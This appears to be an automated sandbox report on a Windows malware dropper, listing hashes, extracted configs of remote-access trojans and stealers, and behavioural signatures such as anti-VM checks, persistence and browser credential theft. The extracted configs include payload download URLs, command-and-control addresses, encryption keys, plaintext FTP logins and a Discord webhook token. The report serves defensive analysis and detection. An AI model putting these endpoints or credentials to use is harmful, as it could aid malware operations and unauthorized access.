Resubmissions
31-12-2024 21:35
241231-1fmqnszqft 1031-12-2024 21:27
241231-1axzfssnek 1016-12-2024 05:27
241216-f5kx6awmh1 1014-12-2024 20:23
241214-y6jqlasrhy 1014-12-2024 20:22
241214-y51bysvmbk 1014-12-2024 20:13
241214-yzc98svkfr 1014-12-2024 13:14
241214-qgw1masrcy 1014-12-2024 13:12
241214-qfk7qsvlaq 312-12-2024 18:19
241212-wymq6ssnat 10Analysis
-
max time kernel
562s -
max time network
563s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-11-2024 00:45
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win11-20241007-en
Behavioral task
behavioral2
Sample
New Text Document mod.exe
Resource
win11-20241007-en
Behavioral task
behavioral3
Sample
New Text Document mod.exe
Resource
win11-20241007-en
General
-
Target
New Text Document mod.exe
-
Size
8KB
-
MD5
69994ff2f00eeca9335ccd502198e05b
-
SHA1
b13a15a5bea65b711b835ce8eccd2a699a99cead
-
SHA256
2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
-
SHA512
ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
-
SSDEEP
96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1
Malware Config
Extracted
https://bitbucket.org/superappsss/1/downloads/papa_hr_build.exe
Extracted
http://176.113.115.178/FF/2.png
Extracted
http://176.113.115.178/FF/3.png
Extracted
Protocol: ftp- Host:
195.239.74.9 - Port:
21 - Username:
ftp - Password:
walle
Extracted
Protocol: ftp- Host:
154.221.143.10 - Port:
21 - Username:
administrator - Password:
F00tb@11
Extracted
Protocol: ftp- Host:
162.255.165.13 - Port:
21 - Username:
ftp - Password:
Password1
Extracted
Protocol: ftp- Host:
104.223.44.14 - Port:
21 - Username:
user - Password:
root
Extracted
quasar
1.4.1
SGVP
192.168.1.9:4782
150.129.206.176:4782
Ai-Sgvp-33452.portmap.host:33452
a35ec7b7-5a95-4207-8f25-7af0a7847fa5
-
encryption_key
09BBDA8FF0524296F02F8F81158F33C0AA74D487
-
install_name
User Application Data.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windowns Client Startup
-
subdirectory
Quasar
Extracted
quasar
1.4.1
Office04
14.243.221.170:2654
a7b38fdd-192e-4e47-b9ba-ca9eb81cc7bd
-
encryption_key
8B9AD736E943A06EAF1321AD479071E83805704C
-
install_name
Runtime Broker.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Runtime Broker
-
subdirectory
SubDir
Extracted
quasar
1.4.1
ZJEB
VIPEEK1990-25013.portmap.host:25013
ad21b115-2c1b-40cb-adba-a50736b76c21
-
encryption_key
3EBA8BC34FA983893A9B07B831E7CEB183F7492D
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Security Service
-
subdirectory
SubDir
Extracted
asyncrat
Default
technical-southwest.gl.at.ply.gg:58694
forums-appliances.gl.at.ply.gg:1962
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
mercurialgrabber
https://discordapp.com/api/webhooks/1308883657456619530/0_Ad9EyrLZrIMKH4vjM6XHyvCJJtKddsiohDSyvCWZ8HIxpyNxmVJgrKb_zO-jqSHSO0
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
3.70.228.168:555
127.0.0.1:4449
135.181.185.254:4449
212.15.49.155:4449
bslxturcmlpmyqrv
-
delay
1
-
install
true
-
install_file
atat.exe
-
install_folder
%AppData%
Extracted
asyncrat
0.5.8
Default
66.66.146.74:9511
nwJFeGdDXcL2
-
delay
3
-
install
true
-
install_file
System32.exe
-
install_folder
%AppData%
Extracted
asyncrat
0.5.7B
Default
3.70.228.168:555
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
xworm
5.0
68.178.207.33:7000
sSM7p4MT4JctLnRS
-
install_file
USB.exe
Extracted
lumma
https://p3ar11fter.sbs
https://3xp3cts1aim.sbs
https://owner-vacat10n.sbs
https://peepburry828.sbs
https://p10tgrace.sbs
https://befall-sm0ker.sbs
https://librari-night.sbs
https://processhol.sbs
https://cook-rain.sbs
Extracted
xworm
3.1
18.181.154.24:7000
w8DsMRIhXrOmk0Gn
-
Install_directory
%AppData%
-
install_file
USB.exe
Signatures
-
Asyncrat family
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral3/files/0x001900000002abaf-91.dat family_umbral behavioral3/memory/1124-98-0x000001DA501F0000-0x000001DA50230000-memory.dmp family_umbral -
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral3/files/0x001300000002a4ff-2061.dat family_xworm behavioral3/memory/5824-2072-0x0000000000FF0000-0x0000000000FFE000-memory.dmp family_xworm behavioral3/memory/3352-4399-0x0000000000400000-0x0000000000410000-memory.dmp family_xworm -
Lokibot family
-
Lumma family
-
Mercurial Grabber Stealer
Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.
-
Mercurialgrabber family
-
Njrat family
-
Quasar family
-
Quasar payload 6 IoCs
resource yara_rule behavioral3/files/0x001f00000002ab2b-7.dat family_quasar behavioral3/memory/336-15-0x0000000000E20000-0x0000000001144000-memory.dmp family_quasar behavioral3/files/0x001b00000002ab99-19.dat family_quasar behavioral3/memory/2308-27-0x0000000000490000-0x00000000007B4000-memory.dmp family_quasar behavioral3/files/0x001a00000002ab9f-40.dat family_quasar behavioral3/memory/4908-52-0x00000000001A0000-0x00000000004C4000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 2988 created 3288 2988 Winsvc.exe 53 PID 768 created 3288 768 Reynolds.com 53 -
Umbral family
-
Xmrig family
-
Xworm family
-
Async RAT payload 5 IoCs
resource yara_rule behavioral3/files/0x001c00000002abaa-60.dat family_asyncrat behavioral3/files/0x001900000002abb2-103.dat family_asyncrat behavioral3/files/0x001a00000002abb8-170.dat family_asyncrat behavioral3/files/0x001900000002abbb-177.dat family_asyncrat behavioral3/files/0x001000000002abbf-210.dat family_asyncrat -
Contacts a large (2748) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ unik.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ L.exe -
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions output.exe -
XMRig Miner payload 2 IoCs
resource yara_rule behavioral3/memory/1860-1719-0x00007FF64A8F0000-0x00007FF64B540000-memory.dmp xmrig behavioral3/memory/1860-2058-0x00007FF64A8F0000-0x00007FF64B540000-memory.dmp xmrig -
Blocklisted process makes network request 4 IoCs
flow pid Process 157 4616 powershell.exe 159 4616 powershell.exe 670 8528 powershell.exe 671 7744 powershell.exe -
pid Process 3660 powershell.exe 4464 powershell.exe 1180 powershell.exe 4616 powershell.exe 8528 powershell.exe 7744 powershell.exe 4864 powershell.exe 3708 powershell.exe 9208 powershell.exe 5624 powershell.exe 7024 powershell.exe 3860 powershell.exe 9164 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts saloader.exe -
Indicator Removal: Network Share Connection Removal 1 TTPs 4 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
pid Process 4976 cmd.exe 2768 net.exe 6764 net.exe 5020 net.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools output.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 4504 netsh.exe -
Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2204 chrome.exe 4844 chrome.exe 5836 msedge.exe 3336 msedge.exe 5296 msedge.exe 3068 chrome.exe 984 chrome.exe 5328 msedge.exe 4084 msedge.exe -
Checks BIOS information in registry 2 TTPs 7 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion unik.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion output.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion unik.exe -
Drops startup file 6 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk 9758xBqgE1azKnB.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StackTrace.vbs Winsvc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk IMG001.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk 9758xBqgE1azKnB.exe -
Executes dropped EXE 64 IoCs
pid Process 336 SGVP%20Client%20Users.exe 2308 Registry.exe 1040 Runtime Broker.exe 4908 seksiak.exe 2740 dsd.exe 4028 Loader.exe 3232 output.exe 1124 saloader.exe 2076 aidans.dont.run.exe 2020 handeltest.exe 4088 xs.exe 3392 Tutorial.exe 1784 aa.exe 2864 nobody.exe 2416 ataturk.exe 4100 start.exe 5052 svchost.exe 2004 atat.exe 404 windows.exe 3404 aspnet_regbrowsers.exe 4172 seksiak.exe 4900 System32.exe 3548 seksiak.exe 2836 seksiak.exe 3796 seksiak.exe 2988 Winsvc.exe 2276 TPB-1.exe 3080 gvndxfghs.exe 5080 random.exe 2184 gvndxfghs.exe 3660 gvndxfghs.exe 844 gvndxfghs.exe 4760 seksiak.exe 2336 unik.exe 1860 xblkpfZ8Y4.exe 2800 test28.exe 1164 test26.exe 2616 test27.exe 3672 test29.exe 5152 test25.exe 5200 test24.exe 5576 seksiak.exe 5668 tik-tok-1.0.5.0-installer_iPXA-F1.exe 5708 main_v4.exe 5736 TikTok18.exe 5940 TikTok18.exe 1044 papa_hr_build.exe 5516 papa_hr_build.exe 5532 fHR9z2C.exe 3068 AmLzNi.exe 6084 seksiak.exe 3020 papa_hr_build.exe 3516 papa_hr_build.exe 7480 seksiak.exe 9080 Xworm%20V5.6.exe 5824 XClient.exe 6804 seksiak.exe 408 VBVEd6f.exe 9156 test12.exe 3668 test6.exe 5480 test14.exe 5296 pantest.exe 5556 test9.exe 6908 test10-29.exe -
Identifies Wine through registry keys 2 TTPs 3 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Wine random.exe Key opened \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Wine unik.exe Key opened \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Wine L.exe -
Loads dropped DLL 14 IoCs
pid Process 3364 cbchr.exe 4688 TikTokDesktop18.exe 7440 ttl.exe 7440 ttl.exe 7440 ttl.exe 7440 ttl.exe 7440 ttl.exe 2868 IMG001.exe 2868 IMG001.exe 2868 IMG001.exe 2868 IMG001.exe 2868 IMG001.exe 2868 IMG001.exe 2868 IMG001.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook gvndxfghs.exe Key opened \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook gvndxfghs.exe Key opened \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook gvndxfghs.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Administrator = "C:\\ProgramData\\Microsoft\\csrss.exe" win.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" IMG001.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\9758xBqgE1azKnB = "C:\\Users\\Admin\\AppData\\Roaming\\9758xBqgE1azKnB.exe" 9758xBqgE1azKnB.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: IMG001.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 1 raw.githubusercontent.com 1 bitbucket.org 3 raw.githubusercontent.com 14 raw.githubusercontent.com 85 bitbucket.org 157 bitbucket.org -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip4.seeip.org 1 ip-api.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum output.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 output.exe -
pid Process 3064 arp.exe 4960 cmd.exe 7748 ARP.EXE -
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 400 powercfg.exe 8088 powercfg.exe 8072 powercfg.exe 6200 cmd.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral3/files/0x000500000002a65e-1867.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 7 IoCs
pid Process 7568 tasklist.exe 5136 tasklist.exe 4512 tasklist.exe 4968 tasklist.exe 7772 tasklist.exe 8008 tasklist.exe 8528 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 5080 random.exe 2336 unik.exe 6652 L.exe -
Suspicious use of SetThreadContext 15 IoCs
description pid Process procid_target PID 3392 set thread context of 2796 3392 Tutorial.exe 112 PID 3080 set thread context of 2184 3080 gvndxfghs.exe 197 PID 3080 set thread context of 3660 3080 gvndxfghs.exe 198 PID 3080 set thread context of 844 3080 gvndxfghs.exe 199 PID 2988 set thread context of 5300 2988 Winsvc.exe 234 PID 1044 set thread context of 5516 1044 papa_hr_build.exe 271 PID 3020 set thread context of 3516 3020 papa_hr_build.exe 306 PID 5484 set thread context of 2868 5484 vg9qcBa.exe 451 PID 3364 set thread context of 3088 3364 cbchr.exe 467 PID 4688 set thread context of 5804 4688 TikTokDesktop18.exe 505 PID 8304 set thread context of 8556 8304 7mpPLxE.exe 553 PID 768 set thread context of 6200 768 Reynolds.com 634 PID 8200 set thread context of 3352 8200 9758xBqgE1azKnB.exe 641 PID 6200 set thread context of 5872 6200 Reynolds.com 643 PID 6604 set thread context of 6008 6604 caspol.exe 713 -
resource yara_rule behavioral3/files/0x000f000000025b17-1604.dat upx behavioral3/memory/1860-1606-0x00007FF64A8F0000-0x00007FF64B540000-memory.dmp upx behavioral3/memory/1860-1719-0x00007FF64A8F0000-0x00007FF64B540000-memory.dmp upx behavioral3/memory/1860-2058-0x00007FF64A8F0000-0x00007FF64B540000-memory.dmp upx -
Drops file in Windows directory 15 IoCs
description ioc Process File opened for modification C:\Windows\IdeasApp 0fVlNye.exe File opened for modification C:\Windows\MozambiqueAppropriate 0fVlNye.exe File opened for modification C:\Windows\VatBukkake 0fVlNye.exe File opened for modification C:\Windows\KeyboardsTwin 0fVlNye.exe File created C:\Windows\Tasks\UAC.job schtasks.exe File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\DownReceptor 0fVlNye.exe File opened for modification C:\Windows\JoiningMazda 0fVlNye.exe File opened for modification C:\Windows\UruguayNorthern 0fVlNye.exe File opened for modification C:\Windows\CoCurious VBVEd6f.exe File opened for modification C:\Windows\CentralAvoiding 0fVlNye.exe File opened for modification C:\Windows\ComfortSick 0fVlNye.exe File opened for modification C:\Windows\TeddySecretariat 0fVlNye.exe File opened for modification C:\Windows\RipeHaiti VBVEd6f.exe File opened for modification C:\Windows\OrganDiscretion 0fVlNye.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral3/files/0x001b00000002ad76-4290.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 13 IoCs
pid pid_target Process procid_target 4744 2184 WerFault.exe 197 4280 844 WerFault.exe 199 1260 844 WerFault.exe 199 3024 844 WerFault.exe 199 4416 1044 WerFault.exe 270 5588 5080 WerFault.exe 196 5848 5516 WerFault.exe 271 5228 5516 WerFault.exe 271 6048 2336 WerFault.exe 209 3612 3020 WerFault.exe 305 5320 3516 WerFault.exe 306 6052 3516 WerFault.exe 306 3076 3364 WerFault.exe 465 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language System32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gvndxfghs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dsd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language papa_hr_build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IMG001.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tftp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VBVEd6f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language papa_hr_build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cbchr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0fVlNye.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tftp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language main_v4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gvndxfghs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IMG001.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TPB-1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tik-tok-1.0.5.0-installer_iPXA-F1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9758xBqgE1azKnB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 43 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3496 PING.EXE 7516 PING.EXE 7372 PING.EXE 7084 PING.EXE 5872 PING.EXE 5748 PING.EXE 6728 PING.EXE 6504 PING.EXE 2580 PING.EXE 8236 PING.EXE 656 PING.EXE 5788 PING.EXE 6108 PING.EXE 5992 PING.EXE 8356 PING.EXE 5008 PING.EXE 688 PING.EXE 2572 PING.EXE 5520 PING.EXE 5344 PING.EXE 3800 PING.EXE 4680 cmd.exe 1432 PING.EXE 3096 PING.EXE 5224 PING.EXE 7896 PING.EXE 8516 PING.EXE 4480 PING.EXE 5292 PING.EXE 1404 PING.EXE 1112 PING.EXE 3336 PING.EXE 5904 PING.EXE 5148 PING.EXE 8920 PING.EXE 1236 PING.EXE 7260 PING.EXE 8100 PING.EXE 8488 PING.EXE 9088 PING.EXE 2788 PING.EXE 6344 PING.EXE 3712 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral3/files/0x001900000002ac95-2906.dat nsis_installer_2 behavioral3/files/0x001c00000002ad2c-3624.dat nsis_installer_1 behavioral3/files/0x001c00000002ad2c-3624.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 1 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S output.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz tik-tok-1.0.5.0-installer_iPXA-F1.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 output.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString output.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 TPB-1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString TPB-1.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 tik-tok-1.0.5.0-installer_iPXA-F1.exe -
Delays execution with timeout.exe 5 IoCs
pid Process 3212 timeout.exe 4084 timeout.exe 2400 timeout.exe 2040 timeout.exe 6972 timeout.exe -
Detects videocard installed 1 TTPs 4 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2532 wmic.exe 5868 wmic.exe 5816 wmic.exe 7928 wmic.exe -
Discovers systems in the same network 1 TTPs 2 IoCs
pid Process 4992 net.exe 6088 net.exe -
Enumerates system info in registry 2 TTPs 34 IoCs
